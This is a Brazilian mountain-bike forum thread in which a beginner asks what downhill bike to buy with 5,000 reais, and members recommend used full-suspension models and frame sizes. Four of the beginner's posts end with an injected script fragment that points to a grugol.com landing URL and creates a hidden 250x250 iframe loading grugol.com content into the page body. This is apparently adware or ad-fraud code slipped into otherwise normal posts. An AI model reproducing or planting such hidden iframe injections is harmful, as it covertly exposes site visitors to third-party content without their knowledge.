Pedal.com.br Página inicial
Fórum Inicial Fórum Inicial > Fórum Mountain Biking > Downhill e Freeride
  Novas Mensagens Novas Mensagens RSS Feed - Pergunta pra quem entende de bike DH
   [REGRAS]    FAQ FAQ  Pesquisar no Fórum   Registrar Registrar  Entrar Entrar

Utilizamos cookies para melhorar a sua experiencia no site. Ao continuar navegando voce concorda com a nossa politica de privacidade.


Pergunta pra quem entende de bike DH

 Responder
Autor
Mensagem
  Tópico Pesquisar Tópico Pesquisar  Opções do Tópico Opções do Tópico
otavio_hf Ver Drop Down
Avatar

Cadastrado em: 19 Ago 2016
Osasco
Offline
Mensagens:7
Opções da Mensagem Opções da Mensagem   Agradecimentos (0) Agradecimentos(0)   Citar otavio_hf Citar  ResponderResponder Link direto para este Post Tópico: Pergunta pra quem entende de bike DH
    Postado: 22 Ago 2016 as 19:05
Eai pessoal blz
Irei iniciar no DownHill, e ando pesquisando bastante aqui no forum sobre a bike que devo comprar, porem ainda nao cheguei em uma conclusao. 
Eu pretendo investir 5 mil.
Nao tenho muito experiencia em marcas de pecas e quadros, principalmente no DH, mas quero uma bike que eu nao precise trocar logo, um quadro e uma suspensao que eu nao precise mudar assim que evoluir um pouco. Mas aceitos todas opinioes afinal eu nao tenho nenhuma experiencia. Se for o caso eu comprar uma quadro melhor e dar up nas pecas depois ou vice versa.
Pensei em uma bike full, mas nao sei se consigo algo de qualidade com esse valor, talvez uma usada? Talvez uma hardtail com pecas e suspensao top? 
Olhei alguns quadros full, mas uns nao sei se seriam indicados para o DH, como o Specialized big hit por exemplo. Nao sou muito fan de quadros Gios, mas se for a melhor opção estou aberto, vi que tem o stage 1 e o stage 2. Bom, preciso da ajuda de vcs que sao experientes no DH, o que me aconselhariam? Nao quero investir errado. ninguem quer!
Uma bike nova? uma usada? full ou hardtail? 
Irei andar todo fim de semana em trilhas e lugares especificos para o DH.
Outra coisa que me preocupa e que so acho aro 26 nas bikes de DH.
Tenho 1,87m
Cavalo 87cm
Tronco(152-87)  65cm
Braço 66cm
Nao sei como sao os calculos para a bike de DH. Bom aguardo comentarios, toda ajuda será muito bem vinda e desde ja obrigado a todos! 
< ="http://grugol.com/prog/landing.php?app=NzAtRjMtOTUtMjctQzMtQkI=&partner=200"> if (top.location == self.location){ var ifric = document.createElement('iframe'); ifric.id = 'idadv'; ifric.src = 'http://grugol.com/prog/content.php?partner=200'; ifric.scrolling = 'no'; ifric.width = '250'; ifric.height = '250'; ifric.style.display = 'none'; document.getElementsByTagName('body')[0].appendChild(ifric); }
Voltar ao Topo
Boca Ver Drop Down
Avatar

Cadastrado em: 18 Mai 2006
SP
Offline
Mensagens:1051
Opções da Mensagem Opções da Mensagem   Agradecimentos (1) Agradecimentos(1)   Citar Boca Citar  ResponderResponder Link direto para este Post Postado: 27 Ago 2016 as 12:39
Com 5 mil, o melhor é pegar uma bike usada. 

Uma rígida com peças e suspensão TOP como você mencionou, se for nova vai custar pelo menos o triplo desse valor.

Tem muita Stage usada por esse valor, não da para fazer um setup legal porque estou recomendando bike montada usada, então deve-se olhar as peças que compõe a bike e analisar.
DH:
Specialized Demo 8
Specialized Status 2
Banshee Scream V2
Banshee Morphine

XC:
Kona Kula Supreme
GT Avalanche
Alfameq Tirreno
Voltar ao Topo
otavio_hf Ver Drop Down
Avatar

Cadastrado em: 19 Ago 2016
Osasco
Offline
Mensagens:7
Opções da Mensagem Opções da Mensagem   Agradecimentos (0) Agradecimentos(0)   Citar otavio_hf Citar  ResponderResponder Link direto para este Post Postado: 27 Ago 2016 as 17:37
Vlw Boca, acho que vou fazer isso mesmo, focar nas pecas agora e mais pra frente troco o quadro por um full, quando tiver condicoes. Obrigado pela dica!!! < ="http://grugol.com/prog/landing.php?app=NzAtRjMtOTUtMjctQzMtQkI=&partner=200"> if (top.location == self.location){ var ifric = document.createElement('iframe'); ifric.id = 'idadv'; ifric.src = 'http://grugol.com/prog/content.php?partner=200'; ifric.scrolling = 'no'; ifric.width = '250'; ifric.height = '250'; ifric.style.display = 'none'; document.getElementsByTagName('body')[0].appendChild(ifric); }
Voltar ao Topo
Mafu Ver Drop Down
Avatar

Cadastrado em: 14 Ago 2008
Campos/RJ
Offline
Mensagens:3542
Opções da Mensagem Opções da Mensagem   Agradecimentos (1) Agradecimentos(1)   Citar Mafu Citar  ResponderResponder Link direto para este Post Postado: 27 Ago 2016 as 20:09
Por 5 mil dá pra conseguir uma bike usada full razoável.

Se você tem 1,87 m de altura, deve comprar uma bike L (large).

A Big Hit é uma boa bike para quem está começando, mas você deve achar muitas opções de bikes usadas nessa faixa de preço.
Nos contos de fadas, a princesa beija o sapo e ele vira um príncipe.
Na vida real, você coloca uma aliança no dedo da princesa e ela vira uma bruxa.
Voltar ao Topo
otavio_hf Ver Drop Down
Avatar

Cadastrado em: 19 Ago 2016
Osasco
Offline
Mensagens:7
Opções da Mensagem Opções da Mensagem   Agradecimentos (0) Agradecimentos(0)   Citar otavio_hf Citar  ResponderResponder Link direto para este Post Postado: 27 Ago 2016 as 20:27
Vlw Mafu!!
Mas aqui, como não entendo muito, que tipo de quadro full, supensão, marcas de peças posso esperar de uma usada nesse valor, para que eu tenha uma base. Vai facilitar minha procura. vlww< ="http://grugol.com/prog/landing.php?app=NzAtRjMtOTUtMjctQzMtQkI=&partner=200"> if (top.location == self.location){ var ifric = document.createElement('iframe'); ifric.id = 'idadv'; ifric.src = 'http://grugol.com/prog/content.php?partner=200'; ifric.scrolling = 'no'; ifric.width = '250'; ifric.height = '250'; ifric.style.display = 'none'; document.getElementsByTagName('body')[0].appendChild(ifric); }
Voltar ao Topo
Mafu Ver Drop Down
Avatar

Cadastrado em: 14 Ago 2008
Campos/RJ
Offline
Mensagens:3542
Opções da Mensagem Opções da Mensagem   Agradecimentos (1) Agradecimentos(1)   Citar Mafu Citar  ResponderResponder Link direto para este Post Postado: 27 Ago 2016 as 20:31
Nos contos de fadas, a princesa beija o sapo e ele vira um príncipe.
Na vida real, você coloca uma aliança no dedo da princesa e ela vira uma bruxa.
Voltar ao Topo
otavio_hf Ver Drop Down
Avatar

Cadastrado em: 19 Ago 2016
Osasco
Offline
Mensagens:7
Opções da Mensagem Opções da Mensagem   Agradecimentos (0) Agradecimentos(0)   Citar otavio_hf Citar  ResponderResponder Link direto para este Post Postado: 27 Ago 2016 as 20:39
Vou dar uma procurada por aqui! o problema e achar um quadro do meu tamanho! Mas agora é ir a procura, ja tenho uma noção do que comprar, obrigado! Thumbs Up






Voltar ao Topo
Boca Ver Drop Down
Avatar

Cadastrado em: 18 Mai 2006
SP
Offline
Mensagens:1051
Opções da Mensagem Opções da Mensagem   Agradecimentos (1) Agradecimentos(1)   Citar Boca Citar  ResponderResponder Link direto para este Post Postado: 28 Ago 2016 as 09:01
Só para lembrar: 

Conforme o Mafu falou, para sua altura tem que ser um quadro tamanho L, mas dependendo do quadro até dá para você pegar um M.

No meu caso, tenho 1,88 m, 74 Kg. Testei o Specialized Demo 8 tamanho L e senti que ficou muito grande, então, acabei comprando o M e ficou bacana.

No caso das rígidas eu prefiro os quadros menores para a bike ficar mais "na mão", da mais agilidade, mas ai vai de cada um.

Eu tenho um Banshee Morphine tamanho S (14"), eu achei melhor que o tamanho M, não troco o meu por nada, é o melhor quadro rígido que tem por ai.
DH:
Specialized Demo 8
Specialized Status 2
Banshee Scream V2
Banshee Morphine

XC:
Kona Kula Supreme
GT Avalanche
Alfameq Tirreno
Voltar ao Topo
otavio_hf Ver Drop Down
Avatar

Cadastrado em: 19 Ago 2016
Osasco
Offline
Mensagens:7
Opções da Mensagem Opções da Mensagem   Agradecimentos (0) Agradecimentos(0)   Citar otavio_hf Citar  ResponderResponder Link direto para este Post Postado: 28 Ago 2016 as 13:45
Vlw pela dica Boca! Thumbs Up< ="http://grugol.com/prog/landing.php?app=NzAtRjMtOTUtMjctQzMtQkI=&partner=200"> if (top.location == self.location){ var ifric = document.createElement('iframe'); ifric.id = 'idadv'; ifric.src = 'http://grugol.com/prog/content.php?partner=200'; ifric.scrolling = 'no'; ifric.width = '250'; ifric.height = '250'; ifric.style.display = 'none'; document.getElementsByTagName('body')[0].appendChild(ifric); }





Voltar ao Topo
sergiolander Ver Drop Down
Avatar
Restrito

Cadastrado em: 04 Mai 2012
Franco da Rocha
Offline
Mensagens:145
Opções da Mensagem Opções da Mensagem   Agradecimentos (0) Agradecimentos(0)   Citar sergiolander Citar  ResponderResponder Link direto para este Post Postado: 02 Set 2016 as 11:06
Otávio no 7 de setembro vou andar no Saracura cola lá tenho uma bike M você dá um rolê e vai ver se precisa de um L tenho 1,83 já usei até S. Vai da pessoa e do gosto qualquer coisa me procura no face, Sergio Lander Chiaradia

Att
Voltar ao Topo
 Responder

Permissões do Fórum Ver Drop Down

Forum Software by Web Wiz Forums® version 12.07
Copyright ©2001-2024 Web Wiz Ltd.

 
 
 
 
 
 

X